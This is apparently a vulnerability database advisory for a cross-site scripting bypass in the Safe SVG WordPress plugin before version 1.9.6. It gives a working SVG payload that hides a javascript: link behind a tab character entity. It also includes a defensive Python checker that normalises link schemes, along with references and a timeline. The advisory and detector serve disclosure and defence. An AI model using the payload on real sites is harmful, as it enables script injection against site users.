Safe SVG < 1.9.6 - XSS Protection Bypass



Description
By using character entities in the payload, an XSS payload bypasses the protection of the Safe SVG plugin.
Proof of Concept
Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw

Create an SVG with the payload below to trigger XSS:
```xml
<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>
```

Video PoC for v1.9.5: https://www.youtube.com/watch?v=hnQA2hc-4_k
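Why the entity matters, as an added example (not the plugin's code or its fix): the XML parser turns `&#9;` into a tab, a prefix test then no longer sees `javascript:`, yet a browser's URL parser drops tabs and newlines before reading the scheme. The prefix check, the allowlist and all function names below are assumptions made for this sketch, which audits an uploaded SVG the way a browser would read its links.

```python
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed allowlist for this example

# Constructed sample: the SVG from the proof of concept above.
POC_SVG = '''<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>'''


def naive_is_script_url(value):
    """Weak check: prefix match on the value exactly as the XML parser returns it."""
    return value.strip().lower().startswith("javascript:")


def normalized_scheme(value):
    """Return the scheme as a browser's URL parser sees it, or None if relative."""
    # Browsers trim leading/trailing C0 controls and spaces, then drop every
    # ASCII tab, LF and CR anywhere in the string before parsing the scheme.
    value = value.strip("".join(map(chr, range(0x21))))
    value = re.sub(r"[\t\n\r]", "", value)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", value)
    return match.group(1).lower() if match else None


def unsafe_links(svg_text):
    """List (tag, raw href) pairs whose normalized scheme is not allowlisted."""
    findings = []
    for element in ET.fromstring(svg_text).iter():
        for attr in ("href", XLINK_HREF):
            value = element.get(attr)
            if value is None:
                continue
            scheme = normalized_scheme(value)
            if scheme is not None and scheme not in ALLOWED_SCHEMES:
                findings.append((element.tag.split("}")[-1], value))
    return findings


if __name__ == "__main__":
    print(unsafe_links(POC_SVG))
```

The allowlist is what does the work here: relative and fragment URLs pass, and any scheme not explicitly permitted is reported regardless of how it was encoded in the file.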

Affects Plugin

Fixed in version 1.9.6

References

URL https://github.com/darylldoyle/svg-sanitizer/issues/31
URL https://github.com/darylldoyle/safe-svg/issues/9

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher 0xd0ff9
Submitter 0xd0ff9
Submitter Website http://0xd0ff9.wordpress.com
Submitter Twitter https://twitter.com/Jok3rDb
Views 2127
Verified No
WPVDB ID 9942

Timeline

Publicly Published 2019-11-08 (11 days ago)
Added 2019-11-08 (10 days ago)
Last Updated 2019-11-08 (10 days ago)
